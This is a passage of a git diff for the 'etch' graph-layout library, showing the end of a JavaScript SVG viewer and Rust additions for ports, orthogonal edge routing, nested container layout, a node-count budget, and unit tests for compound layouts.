svg.dispatchEvent(new CustomEvent('etch-container-select', { + detail: { id: containerId } + })); + } + } + + // Emit selection event + const selected = Array.from(svg.querySelectorAll('.node.selected')) + .map(n => n.getAttribute('data-id')) + .filter(Boolean); + svg.dispatchEvent(new CustomEvent('etch-select', { + detail: { ids: selected } + })); + }); + + // --- URL highlight parameter --- + const params = new URLSearchParams(window.location.search); + const highlightId = params.get('highlight'); + if (highlightId) { + const node = svg.querySelector(`.node[data-id="${CSS.escape(highlightId)}"]`); + if (node) { + node.classList.add('selected'); + // Pan to highlighted node + const rect = node.querySelector('rect'); + if (rect) { + const nx = parseFloat(rect.getAttribute('x')); + const ny = parseFloat(rect.getAttribute('y')); + vx = nx - vw / 4; + vy = ny - vh / 4; + 
updateViewBox(); + } + } + } + + // --- Semantic zoom --- + function updateSemanticZoom() { + svg.classList.toggle('zoom-low', scale < 0.5); + svg.classList.toggle('zoom-overview', scale < 0.25); + } + + function updateViewBox() { + svg.setAttribute('viewBox', `${vx} ${vy} ${vw} ${vh}`); + } +})(); diff --git a/etch/src/layout.rs b/etch/src/layout.rs index 4256b08..2cca02b 100644 --- a/etch/src/layout.rs +++ b/etch/src/layout.rs @@ -29,6 +29,16 @@ pub enum RankDirection { LeftToRight, } +/// Edge routing strategy. +#[derive(Debug, Clone, Copy, Default, PartialEq, Eq)] +pub enum EdgeRouting { + /// Orthogonal routing with right-angle bends. + #[default] + Orthogonal, + /// Cubic bezier curves (legacy behavior). + CubicBezier, +} + /// Options that control the layout algorithm. #[derive(Debug, Clone)] pub struct LayoutOptions { @@ -45,6 +55,21 @@ pub struct LayoutOptions { /// Force nodes whose `node_type` matches a key to a specific rank. /// Ranks are 0-based; lower ranks are rendered closer to the root. pub type_ranks: HashMap, + /// Padding inside container nodes (px). + pub container_padding: f64, + /// Height of the container header (for the label) (px). + pub container_header: f64, + /// Maximum number of nodes before the layout bails out with a + /// sentinel "budget exceeded" node. `None` means no limit. + pub max_nodes: Option, + /// Edge routing strategy. + pub edge_routing: EdgeRouting, + /// Penalty for each bend in orthogonal routing (higher = fewer bends). + pub bend_penalty: f64, + /// Gap between parallel edge segments (px). + pub edge_separation: f64, + /// Minimum straight stub length leaving a port before any bend (px). 
+ pub port_stub_length: f64, } impl Default for LayoutOptions { @@ -56,10 +81,97 @@ impl Default for LayoutOptions { node_separation: 40.0, rank_direction: RankDirection::default(), type_ranks: HashMap::new(), + container_padding: 20.0, + container_header: 30.0, + max_nodes: None, + edge_routing: EdgeRouting::default(), + bend_penalty: 20.0, + edge_separation: 4.0, + port_stub_length: 10.0, } } } +// --------------------------------------------------------------------------- +// Port types +// --------------------------------------------------------------------------- + +/// Side of the node where a port is positioned. +#[derive(Debug, Clone, Copy, Default, PartialEq, Eq)] +pub enum PortSide { + Left, + Right, + Top, + Bottom, + /// Let the layout algorithm choose based on direction. + #[default] + Auto, +} + +/// Direction of data flow through a port. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum PortDirection { + In, + Out, + InOut, +} + +/// Visual category of a port (determines color in SVG rendering). +#[derive(Debug, Clone, Copy, Default, PartialEq, Eq)] +pub enum PortType { + /// Data port (blue #4a90d9). + #[default] + Data, + /// Event port (orange #e67e22). + Event, + /// Event-data port (green #27ae60). + EventData, + /// Access port (gray #999). + Access, + /// Feature group (purple #9b59b6). + Group, + /// Abstract feature (dark gray #666). + Abstract, +} + +/// Display-level information about a port on a node. +#[derive(Debug, Clone)] +pub struct PortInfo { + /// Unique identifier within the owning node. + pub id: String, + /// Label rendered next to the port circle. + pub label: String, + /// Which side of the node this port appears on. + pub side: PortSide, + /// Direction of data flow. + pub direction: PortDirection, + /// Visual category (determines color). + pub port_type: PortType, +} + +/// A positioned port on a layout node. +#[derive(Debug, Clone)] +pub struct LayoutPort { + /// Port identifier. + pub id: String, + /// Label text. 
+ pub label: String, + /// X coordinate of port center (absolute). + pub x: f64, + /// Y coordinate of port center (absolute). + pub y: f64, + /// Which side of the node. + pub side: PortSide, + /// Direction indicator. + pub direction: PortDirection, + /// Visual type. + pub port_type: PortType, +} + +// --------------------------------------------------------------------------- +// Node / Edge / Layout types +// --------------------------------------------------------------------------- + /// Display-level information about a node supplied by the caller. #[derive(Debug, Clone)] pub struct NodeInfo { @@ -71,6 +183,14 @@ pub struct NodeInfo { pub node_type: String, /// Optional secondary text (e.g. a title below the ID). pub sublabel: Option, + /// Optional parent container ID. When set, this node is placed + /// *inside* the container whose [`NodeInfo::id`] matches. The layout + /// algorithm lays out each container's children independently and then + /// sizes the container to fit its content. + pub parent: Option, + /// Ports on this node. Empty for nodes without explicit ports; + /// edges then connect to node centers (backward compatible). + pub ports: Vec, } /// Display-level information about an edge supplied by the caller. @@ -78,6 +198,10 @@ pub struct NodeInfo { pub struct EdgeInfo { /// Label rendered along the edge path. pub label: String, + /// Source port ID (within source node). `None` = connect to node center. + pub source_port: Option, + /// Target port ID (within target node). `None` = connect to node center. + pub target_port: Option, } /// A positioned node produced by the layout algorithm. @@ -101,6 +225,10 @@ pub struct LayoutNode { pub node_type: String, /// Optional secondary label. pub sublabel: Option, + /// `true` when this node is a container with children laid out inside. + pub is_container: bool, + /// Positioned ports on this node. + pub ports: Vec, } /// A routed edge produced by the layout algorithm. 
@@ -114,6 +242,10 @@ pub struct LayoutEdge { pub label: String, /// Ordered polyline waypoints `(x, y)`. pub points: Vec<(f64, f64)>, + /// Source port ID if edge connects to a specific port. + pub source_port: Option, + /// Target port ID if edge connects to a specific port. + pub target_port: Option, } /// Complete layout result. @@ -158,12 +290,51 @@ pub fn layout( }; } + // Budget check: bail out if the graph exceeds the node limit. + if options + .max_nodes + .is_some_and(|max| graph.node_count() > max) + { + let max = options.max_nodes.unwrap(); + return GraphLayout { + nodes: vec![LayoutNode { + id: "__budget_exceeded__".into(), + label: format!( + "Graph has {} nodes (budget: {}). Use type filters or focus on a specific artifact.", + graph.node_count(), + max + ), + x: 0.0, + y: 0.0, + width: 500.0, + height: 60.0, + rank: 0, + node_type: String::new(), + sublabel: None, + is_container: false, + ports: Vec::new(), + }], + edges: Vec::new(), + width: 500.0, + height: 60.0, + }; + } + // Collect node info up-front so we can reference it throughout. let infos: HashMap = graph .node_indices() .map(|idx| (idx, node_info(idx, &graph[idx]))) .collect(); + // Check if this is a compound graph (any node has a parent). + let has_compound = infos.values().any(|info| info.parent.is_some()); + + if has_compound { + return layout_compound(graph, &infos, edge_info, options); + } + + // --- Flat layout (original algorithm) --- + // Build NodeIndex → id map for edge routing. let idx_to_id: HashMap = infos .iter() @@ -181,7 +352,8 @@ pub fn layout( } // Phase 3 — coordinate assignment. - let (layout_nodes, total_w, total_h) = assign_coordinates(&rank_lists, &infos, &ranks, options); + let (layout_nodes, total_w, total_h) = + assign_coordinates(&rank_lists, &infos, &ranks, options, &HashMap::new()); // Phase 4 — edge routing. 
let layout_edges = route_edges(graph, edge_info, &layout_nodes, &idx_to_id, options); @@ -382,74 +554,249 @@ fn sweep_up( // Phase 3: Coordinate assignment // --------------------------------------------------------------------------- +/// Per-node size, accounting for container overrides and port counts. +fn node_size( + idx: NodeIndex, + options: &LayoutOptions, + size_overrides: &HashMap, + infos: &HashMap, +) -> (f64, f64) { + if let Some(&size) = size_overrides.get(&idx) { + return size; + } + let base_w = options.node_width; + let mut base_h = options.node_height; + + // Grow height if ports need more space (12px per port + 8px padding) + if let Some(info) = infos.get(&idx) { + let (left, right) = resolved_side_counts(&info.ports); + let max_side = left.max(right); + if max_side > 0 { + let port_h = max_side as f64 * 12.0 + 8.0; + base_h = base_h.max(port_h); + } + } + + (base_w, base_h) +} + fn assign_coordinates( rank_lists: &[Vec], infos: &HashMap, ranks: &HashMap, options: &LayoutOptions, + size_overrides: &HashMap, ) -> (Vec, f64, f64) { let mut nodes: Vec = Vec::new(); let mut max_x: f64 = 0.0; let mut max_y: f64 = 0.0; - // Compute the maximum rank width so we can center narrower ranks. + // Compute per-rank width and height (max node height determines rank spacing). 
let rank_widths: Vec = rank_lists .iter() .map(|list| { if list.is_empty() { - 0.0 - } else { - list.len() as f64 * options.node_width - + (list.len() as f64 - 1.0) * options.node_separation + return 0.0; } + let total_w: f64 = list + .iter() + .map(|&idx| node_size(idx, options, size_overrides, infos).0) + .sum(); + total_w + (list.len() as f64 - 1.0) * options.node_separation + }) + .collect(); + + let rank_heights: Vec = rank_lists + .iter() + .map(|list| { + list.iter() + .map(|&idx| node_size(idx, options, size_overrides, infos).1) + .fold(options.node_height, f64::max) }) .collect(); let global_max_width = rank_widths.iter().cloned().fold(0.0f64, f64::max); + // Cumulative Y offset per rank (for variable-height ranks). + let mut rank_y: Vec = Vec::with_capacity(rank_lists.len()); + let mut cum_y = 0.0; + for (i, _) in rank_lists.iter().enumerate() { + rank_y.push(cum_y); + cum_y += rank_heights[i] + options.rank_separation; + } + for (rank, list) in rank_lists.iter().enumerate() { let rank_width = rank_widths[rank]; let x_offset = (global_max_width - rank_width) / 2.0; - for (pos, &idx) in list.iter().enumerate() { + let mut x_cursor = x_offset; + for &idx in list { let info = &infos[&idx]; + let (nw, nh) = node_size(idx, options, size_overrides, infos); + let is_container = size_overrides.contains_key(&idx); + let (x, y) = match options.rank_direction { RankDirection::TopToBottom => { - let x = x_offset + pos as f64 * (options.node_width + options.node_separation); - let y = rank as f64 * (options.node_height + options.rank_separation); - (x, y) + // Center node vertically within its rank row. 
+ let y = rank_y[rank] + (rank_heights[rank] - nh) / 2.0; + (x_cursor, y) } RankDirection::LeftToRight => { - let x = rank as f64 * (options.node_width + options.rank_separation); - let y = x_offset + pos as f64 * (options.node_height + options.node_separation); - (x, y) + let x = rank_y[rank] + (rank_heights[rank] - nw) / 2.0; + (x, x_cursor) } }; - if x + options.node_width > max_x { - max_x = x + options.node_width; + if x + nw > max_x { + max_x = x + nw; } - if y + options.node_height > max_y { - max_y = y + options.node_height; + if y + nh > max_y { + max_y = y + nh; } - nodes.push(LayoutNode { + let mut layout_node = LayoutNode { id: info.id.clone(), x, y, - width: options.node_width, - height: options.node_height, + width: nw, + height: nh, rank: *ranks.get(&idx).unwrap_or(&rank), label: info.label.clone(), node_type: info.node_type.clone(), sublabel: info.sublabel.clone(), - }); + is_container, + ports: Vec::new(), + }; + layout_node.ports = position_ports(&layout_node, &info.ports); + nodes.push(layout_node); + + x_cursor += nw + options.node_separation; } } (nodes, max_x, max_y) } +// --------------------------------------------------------------------------- +// Port positioning +// --------------------------------------------------------------------------- + +/// Compute positioned ports for a laid-out node. 
+fn position_ports(node: &LayoutNode, ports: &[PortInfo]) -> Vec { + if ports.is_empty() { + return Vec::new(); + } + + // Resolve Auto sides based on direction + let resolved_side = |p: &PortInfo| -> PortSide { + match p.side { + PortSide::Auto => match p.direction { + PortDirection::In => PortSide::Left, + PortDirection::Out | PortDirection::InOut => PortSide::Right, + }, + other => other, + } + }; + + let mut left: Vec<&PortInfo> = Vec::new(); + let mut right: Vec<&PortInfo> = Vec::new(); + let mut top: Vec<&PortInfo> = Vec::new(); + let mut bottom: Vec<&PortInfo> = Vec::new(); + + for p in ports { + match resolved_side(p) { + PortSide::Left => left.push(p), + PortSide::Right => right.push(p), + PortSide::Top => top.push(p), + PortSide::Bottom => bottom.push(p), + PortSide::Auto => unreachable!(), + } + } + + let mut result = Vec::new(); + + // Place ports evenly along each side + let place_vertical = + |ports: &[&PortInfo], fixed_x: f64, y_start: f64, y_len: f64| -> Vec { + let n = ports.len(); + if n == 0 { + return vec![]; + } + let spacing = y_len / (n as f64 + 1.0); + ports + .iter() + .enumerate() + .map(|(i, p)| LayoutPort { + id: p.id.clone(), + label: p.label.clone(), + x: fixed_x, + y: y_start + spacing * (i as f64 + 1.0), + side: resolved_side(p), + direction: p.direction, + port_type: p.port_type, + }) + .collect() + }; + + let place_horizontal = + |ports: &[&PortInfo], fixed_y: f64, x_start: f64, x_len: f64| -> Vec { + let n = ports.len(); + if n == 0 { + return vec![]; + } + let spacing = x_len / (n as f64 + 1.0); + ports + .iter() + .enumerate() + .map(|(i, p)| LayoutPort { + id: p.id.clone(), + label: p.label.clone(), + x: x_start + spacing * (i as f64 + 1.0), + y: fixed_y, + side: resolved_side(p), + direction: p.direction, + port_type: p.port_type, + }) + .collect() + }; + + result.extend(place_vertical(&left, node.x, node.y, node.height)); + result.extend(place_vertical( + &right, + node.x + node.width, + node.y, + node.height, + )); + 
result.extend(place_horizontal(&top, node.y, node.x, node.width)); + result.extend(place_horizontal( + &bottom, + node.y + node.height, + node.x, + node.width, + )); + + result +} + +/// Count ports per side after resolving Auto, returns (left, right). +#[allow(dead_code)] +fn resolved_side_counts(ports: &[PortInfo]) -> (usize, usize) { + let mut left = 0usize; + let mut right = 0usize; + for p in ports { + match p.side { + PortSide::Left => left += 1, + PortSide::Right => right += 1, + PortSide::Auto => match p.direction { + PortDirection::In => left += 1, + PortDirection::Out | PortDirection::InOut => right += 1, + }, + _ => {} // Top/Bottom don't affect height + } + } + (left, right) +} + // --------------------------------------------------------------------------- // Phase 4: Edge routing // --------------------------------------------------------------------------- @@ -490,13 +837,51 @@ fn route_edges( None => continue, }; - let points = compute_waypoints(src_node, tgt_node, options); + // If ports are specified, snap to port positions + let src_point = info + .source_port + .as_ref() + .and_then(|pid| src_node.ports.iter().find(|p| p.id == *pid)) + .map(|p| (p.x, p.y)); + let tgt_point = info + .target_port + .as_ref() + .and_then(|pid| tgt_node.ports.iter().find(|p| p.id == *pid)) + .map(|p| (p.x, p.y)); + + // Compute start/end points (port-aware or center-based) + let start = src_point.unwrap_or_else(|| { + ( + src_node.x + src_node.width / 2.0, + src_node.y + src_node.height, + ) + }); + let end = tgt_point.unwrap_or_else(|| (tgt_node.x + tgt_node.width / 2.0, tgt_node.y)); + + let points = match options.edge_routing { + EdgeRouting::Orthogonal => crate::ortho::route_orthogonal( + layout_nodes, + start, + end, + options.bend_penalty, + options.port_stub_length, + ), + EdgeRouting::CubicBezier => { + if src_point.is_some() || tgt_point.is_some() { + vec![start, end] + } else { + compute_waypoints(src_node, tgt_node, options) + } + } + }; 
edges.push(LayoutEdge { source_id: src_id.clone(), target_id: tgt_id.clone(), label: info.label, points, + source_port: info.source_port, + target_port: info.target_port, }); } @@ -540,6 +925,324 @@ fn compute_waypoints( points } +// --------------------------------------------------------------------------- +// Compound (nested/hierarchical) layout +// --------------------------------------------------------------------------- + +/// Recursive bottom-up compound layout. +/// +/// 1. Build containment tree from `NodeInfo::parent`. +/// 2. Bottom-up: lay out each container's children using Sugiyama, then size +/// the container to fit its children + padding + header. +/// 3. Lay out root-level nodes (some with variable sizes) using Sugiyama. +/// 4. Translate all children to absolute coordinates. +/// 5. Route edges globally. +fn layout_compound( + graph: &Graph, + infos: &HashMap, + edge_info: &impl Fn(EdgeIndex, &E) -> EdgeInfo, + options: &LayoutOptions, +) -> GraphLayout { + let id_to_idx: HashMap<&str, NodeIndex> = infos + .iter() + .map(|(&idx, info)| (info.id.as_str(), idx)) + .collect(); + + // Build children map: parent_idx → [child_idx, ...] + let mut children_of: HashMap> = HashMap::new(); + let mut root_nodes: Vec = Vec::new(); + + for (&idx, info) in infos { + match &info.parent { + Some(parent_id) => { + if let Some(&parent_idx) = id_to_idx.get(parent_id.as_str()) { + children_of.entry(parent_idx).or_default().push(idx); + } else { + root_nodes.push(idx); // parent not found, treat as root + } + } + None => root_nodes.push(idx), + } + } + + root_nodes.sort_by(|a, b| infos[a].id.cmp(&infos[b].id)); + + // Find all containers and determine depth (for bottom-up ordering). + let containers: Vec = children_of.keys().copied().collect(); + let container_depths = compute_container_depths(&containers, infos, &id_to_idx); + + // Sort containers by depth (deepest first = bottom-up). 
+ let mut sorted_containers: Vec = containers.clone(); + sorted_containers.sort_by(|a, b| { + container_depths + .get(b) + .cmp(&container_depths.get(a)) + .then_with(|| infos[a].id.cmp(&infos[b].id)) + }); + + // Bottom-up: lay out each container's children, compute sizes. + let mut container_sizes: HashMap = HashMap::new(); + let mut child_layouts: HashMap> = HashMap::new(); + let pad = options.container_padding; + let hdr = options.container_header; + + for &container_idx in &sorted_containers { + let children = match children_of.get(&container_idx) { + Some(c) => c, + None => continue, + }; + + // Build sub-graph of just these children. + let child_set: std::collections::HashSet = children.iter().copied().collect(); + let mut sub_graph: Graph = Graph::new(); + let mut orig_to_sub: HashMap = HashMap::new(); + + for &child_idx in children { + let sub_idx = sub_graph.add_node(child_idx); + orig_to_sub.insert(child_idx, sub_idx); + } + + // Add edges between children (skip edges to nodes outside this container). + for edge in graph.edge_references() { + let src = edge.source(); + let tgt = edge.target(); + if child_set.contains(&src) + && child_set.contains(&tgt) + && let (Some(&s), Some(&t)) = (orig_to_sub.get(&src), orig_to_sub.get(&tgt)) + { + sub_graph.add_edge(s, t, ()); + } + } + + // Build infos for sub-graph nodes (map sub_idx → original info). + let sub_infos: HashMap = sub_graph + .node_indices() + .map(|sub_idx| { + let orig_idx = sub_graph[sub_idx]; + (sub_idx, infos[&orig_idx].clone()) + }) + .collect(); + + // Sub-nodes that are themselves containers get their computed sizes. + let mut sub_sizes: HashMap = HashMap::new(); + for &sub_idx in sub_infos.keys() { + let orig_idx = sub_graph[sub_idx]; + if let Some(&size) = container_sizes.get(&orig_idx) { + sub_sizes.insert(sub_idx, size); + } + } + + // Run flat layout on the sub-graph. 
+ let sub_ranks = assign_ranks(&sub_graph, &sub_infos, options); + let mut sub_rank_lists = build_rank_lists(&sub_graph, &sub_ranks); + for _ in 0..4 { + sweep_down(&sub_graph, &mut sub_rank_lists, &sub_ranks); + sweep_up(&sub_graph, &mut sub_rank_lists, &sub_ranks); + } + let (mut sub_nodes, sub_w, sub_h) = + assign_coordinates(&sub_rank_lists, &sub_infos, &sub_ranks, options, &sub_sizes); + + // Map sub-graph IDs back to original IDs and store child layouts. + // Sub-graph nodes are in relative coordinates (origin at 0,0). + // Merge any grandchild layouts into the flat list. + let mut all_children_nodes: Vec = Vec::new(); + for sub_node in &mut sub_nodes { + let orig_idx_opt = sub_graph + .node_indices() + .find(|&si| sub_infos[&si].id == sub_node.id); + if let Some(sub_idx) = orig_idx_opt { + let orig_idx = sub_graph[sub_idx]; + // If this child is itself a container, pull its laid-out children + // and translate them relative to this child's position. + if let Some(grandchildren) = child_layouts.remove(&orig_idx) { + let offset_x = sub_node.x + pad; + let offset_y = sub_node.y + hdr; + for mut gc in grandchildren { + gc.x += offset_x; + gc.y += offset_y; + all_children_nodes.push(gc); + } + } + } + all_children_nodes.push(sub_node.clone()); + } + + // Container size = content + padding + header. + let container_w = sub_w + pad * 2.0; + let container_h = sub_h + pad + hdr; + container_sizes.insert( + container_idx, + ( + container_w.max(options.node_width), + container_h.max(options.node_height), + ), + ); + child_layouts.insert(container_idx, all_children_nodes); + } + + // Now lay out the root level with variable sizes for containers. 
+ let root_set: std::collections::HashSet = root_nodes.iter().copied().collect(); + let mut root_graph: Graph = Graph::new(); + let mut orig_to_root: HashMap = HashMap::new(); + + for &root_idx in &root_nodes { + let r_idx = root_graph.add_node(root_idx); + orig_to_root.insert(root_idx, r_idx); + } + + // Add edges between root-level nodes. + // An edge between two nodes in different root-level subtrees + // becomes an edge between their root ancestors. + for edge in graph.edge_references() { + let src_root = find_root_ancestor(edge.source(), infos, &id_to_idx); + let tgt_root = find_root_ancestor(edge.target(), infos, &id_to_idx); + if src_root != tgt_root + && root_set.contains(&src_root) + && root_set.contains(&tgt_root) + && let (Some(&s), Some(&t)) = (orig_to_root.get(&src_root), orig_to_root.get(&tgt_root)) + { + // Avoid duplicate edges. + if !root_graph.contains_edge(s, t) { + root_graph.add_edge(s, t, ()); + } + } + } + + let root_infos: HashMap = root_graph + .node_indices() + .map(|r_idx| { + let orig_idx = root_graph[r_idx]; + (r_idx, infos[&orig_idx].clone()) + }) + .collect(); + + let mut root_sizes: HashMap = HashMap::new(); + for &r_idx in root_infos.keys() { + let orig_idx = root_graph[r_idx]; + if let Some(&size) = container_sizes.get(&orig_idx) { + root_sizes.insert(r_idx, size); + } + } + + let root_ranks = assign_ranks(&root_graph, &root_infos, options); + let mut root_rank_lists = build_rank_lists(&root_graph, &root_ranks); + for _ in 0..4 { + sweep_down(&root_graph, &mut root_rank_lists, &root_ranks); + sweep_up(&root_graph, &mut root_rank_lists, &root_ranks); + } + let (root_layout_nodes, total_w, total_h) = assign_coordinates( + &root_rank_lists, + &root_infos, + &root_ranks, + options, + &root_sizes, + ); + + // Build final node list: root nodes + translated children. + let mut all_nodes: Vec = Vec::new(); + + for root_node in &root_layout_nodes { + // Find original index for this root node. 
+ let orig_idx = root_graph + .node_indices() + .find(|&ri| root_infos[&ri].id == root_node.id) + .map(|ri| root_graph[ri]); + + if let Some(orig_idx) = orig_idx + && let Some(children) = child_layouts.remove(&orig_idx) + { + // Translate children to be inside this container. + let offset_x = root_node.x + pad; + let offset_y = root_node.y + hdr; + for mut child in children { + child.x += offset_x; + child.y += offset_y; + all_nodes.push(child); + } + } + + all_nodes.push(root_node.clone()); + } + + // Route edges globally using final positions. + let idx_to_id: HashMap = infos + .iter() + .map(|(&idx, info)| (idx, info.id.clone())) + .collect(); + let layout_edges = route_edges(graph, edge_info, &all_nodes, &idx_to_id, options); + + GraphLayout { + nodes: all_nodes, + edges: layout_edges, + width: total_w, + height: total_h, + } +} + +/// Compute nesting depth for each container (0 = no parent, 1 = parent is root, etc.). +fn compute_container_depths( + containers: &[NodeIndex], + infos: &HashMap, + id_to_idx: &HashMap<&str, NodeIndex>, +) -> HashMap { + let container_set: std::collections::HashSet = containers.iter().copied().collect(); + let mut depths: HashMap = HashMap::new(); + + fn depth_of( + idx: NodeIndex, + infos: &HashMap, + id_to_idx: &HashMap<&str, NodeIndex>, + container_set: &std::collections::HashSet, + cache: &mut HashMap, + ) -> usize { + if let Some(&d) = cache.get(&idx) { + return d; + } + let d = match &infos[&idx].parent { + Some(parent_id) => { + if let Some(&parent_idx) = id_to_idx.get(parent_id.as_str()) { + if container_set.contains(&parent_idx) { + 1 + depth_of(parent_idx, infos, id_to_idx, container_set, cache) + } else { + 0 + } + } else { + 0 + } + } + None => 0, + }; + cache.insert(idx, d); + d + } + + for &idx in containers { + depth_of(idx, infos, id_to_idx, &container_set, &mut depths); + } + depths +} + +/// Walk up parent chain to find the root-level ancestor. 
+fn find_root_ancestor( + idx: NodeIndex, + infos: &HashMap, + id_to_idx: &HashMap<&str, NodeIndex>, +) -> NodeIndex { + let mut current = idx; + loop { + match &infos[¤t].parent { + Some(parent_id) => { + if let Some(&parent_idx) = id_to_idx.get(parent_id.as_str()) { + current = parent_idx; + } else { + return current; + } + } + None => return current, + } + } +} + // --------------------------------------------------------------------------- // Tests // --------------------------------------------------------------------------- @@ -555,12 +1258,16 @@ mod tests { label: label.to_string(), node_type: "default".into(), sublabel: None, + parent: None, + ports: vec![], } } fn simple_edge_info(_idx: EdgeIndex, label: &&str) -> EdgeInfo { EdgeInfo { label: label.to_string(), + source_port: None, + target_port: None, } } @@ -717,6 +1424,319 @@ mod tests { assert!(node_a.x < node_b.x); } + // ----------------------------------------------------------------------- + // Compound (nested) layout tests + // ----------------------------------------------------------------------- + + #[test] + fn compound_one_level_nesting() { + // Container S with two children A, B inside; edge A→B. + let mut g = Graph::new(); + let _s = g.add_node("S"); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "ab"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: if *n == "A" || *n == "B" { + Some("S".into()) + } else { + None + }, + ports: vec![], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + // Should have 3 nodes: S (container), A, B. + assert_eq!(result.nodes.len(), 3); + + let node_s = result.nodes.iter().find(|n| n.id == "S").unwrap(); + let node_a = result.nodes.iter().find(|n| n.id == "A").unwrap(); + let node_b = result.nodes.iter().find(|n| n.id == "B").unwrap(); + + // S must be a container. 
+ assert!(node_s.is_container, "S should be a container"); + assert!(!node_a.is_container); + assert!(!node_b.is_container); + + // Children must be positioned inside the container. + assert!(node_a.x >= node_s.x, "A.x should be inside S"); + assert!(node_a.y >= node_s.y, "A.y should be inside S"); + assert!(node_b.x >= node_s.x, "B.x should be inside S"); + assert!(node_b.y >= node_s.y, "B.y should be inside S"); + + // Container must be large enough to contain children. + assert!( + node_s.width > 0.0 && node_s.height > 0.0, + "container should have positive size" + ); + let s_right = node_s.x + node_s.width; + let s_bottom = node_s.y + node_s.height; + assert!( + node_a.x + node_a.width <= s_right + 1.0, + "A right edge should be inside S" + ); + assert!( + node_b.x + node_b.width <= s_right + 1.0, + "B right edge should be inside S" + ); + assert!( + node_b.y + node_b.height <= s_bottom + 1.0, + "B bottom edge should be inside S" + ); + } + + #[test] + fn compound_two_level_nesting() { + // Root R contains P; P contains T1, T2; edge T1→T2. + let mut g = Graph::new(); + let _r = g.add_node("R"); + let _p = g.add_node("P"); + let t1 = g.add_node("T1"); + let t2 = g.add_node("T2"); + g.add_edge(t1, t2, "link"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: match *n { + "P" => Some("R".into()), + "T1" | "T2" => Some("P".into()), + _ => None, + }, + ports: vec![], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + assert_eq!(result.nodes.len(), 4); + + let node_r = result.nodes.iter().find(|n| n.id == "R").unwrap(); + let node_p = result.nodes.iter().find(|n| n.id == "P").unwrap(); + let node_t1 = result.nodes.iter().find(|n| n.id == "T1").unwrap(); + let node_t2 = result.nodes.iter().find(|n| n.id == "T2").unwrap(); + + // Both R and P are containers. 
+ assert!(node_r.is_container); + assert!(node_p.is_container); + assert!(!node_t1.is_container); + assert!(!node_t2.is_container); + + // P must be inside R. + assert!(node_p.x >= node_r.x); + assert!(node_p.y >= node_r.y); + + // T1 and T2 must be inside P. + assert!(node_t1.x >= node_p.x); + assert!(node_t1.y >= node_p.y); + assert!(node_t2.x >= node_p.x); + assert!(node_t2.y >= node_p.y); + + // Transitive: T1, T2 must also be inside R. + assert!(node_t1.x >= node_r.x); + assert!(node_t1.y >= node_r.y); + } + + #[test] + fn compound_sibling_containers() { + // Two sibling containers P1, P2 at root level, each with one child. + let mut g = Graph::new(); + let _p1 = g.add_node("P1"); + let _p2 = g.add_node("P2"); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "cross"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: match *n { + "A" => Some("P1".into()), + "B" => Some("P2".into()), + _ => None, + }, + ports: vec![], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + let node_p1 = result.nodes.iter().find(|n| n.id == "P1").unwrap(); + let node_p2 = result.nodes.iter().find(|n| n.id == "P2").unwrap(); + let node_a = result.nodes.iter().find(|n| n.id == "A").unwrap(); + let node_b = result.nodes.iter().find(|n| n.id == "B").unwrap(); + + assert!(node_p1.is_container); + assert!(node_p2.is_container); + + // A inside P1, B inside P2. + assert!(node_a.x >= node_p1.x); + assert!(node_b.x >= node_p2.x); + + // Cross-container edge should exist. + assert_eq!(result.edges.len(), 1); + assert_eq!(result.edges[0].source_id, "A"); + assert_eq!(result.edges[0].target_id, "B"); + } + + #[test] + fn compound_container_larger_than_leaf() { + // A container with 3 children should be wider/taller than default leaf size. 
+ let mut g = Graph::new(); + let _s = g.add_node("S"); + let a = g.add_node("A"); + let b = g.add_node("B"); + let c = g.add_node("C"); + g.add_edge(a, b, "ab"); + g.add_edge(b, c, "bc"); + + let opts = LayoutOptions::default(); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: if *n != "S" { Some("S".into()) } else { None }, + ports: vec![], + }, + &simple_edge_info, + &opts, + ); + + let node_s = result.nodes.iter().find(|n| n.id == "S").unwrap(); + + // Container must be larger than a default leaf node. + assert!( + node_s.width > opts.node_width, + "container width {} should exceed default {}", + node_s.width, + opts.node_width + ); + assert!( + node_s.height > opts.node_height, + "container height {} should exceed default {}", + node_s.height, + opts.node_height + ); + } + + #[test] + fn compound_mixed_root_and_container() { + // Mix of root-level leaf nodes and containers. + let mut g = Graph::new(); + let _s = g.add_node("S"); + let a = g.add_node("A"); + let b = g.add_node("B"); + let leaf = g.add_node("Leaf"); + g.add_edge(a, b, "ab"); + g.add_edge(_s, leaf, "s-leaf"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: match *n { + "A" | "B" => Some("S".into()), + _ => None, + }, + ports: vec![], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + // All 4 nodes should be present. 
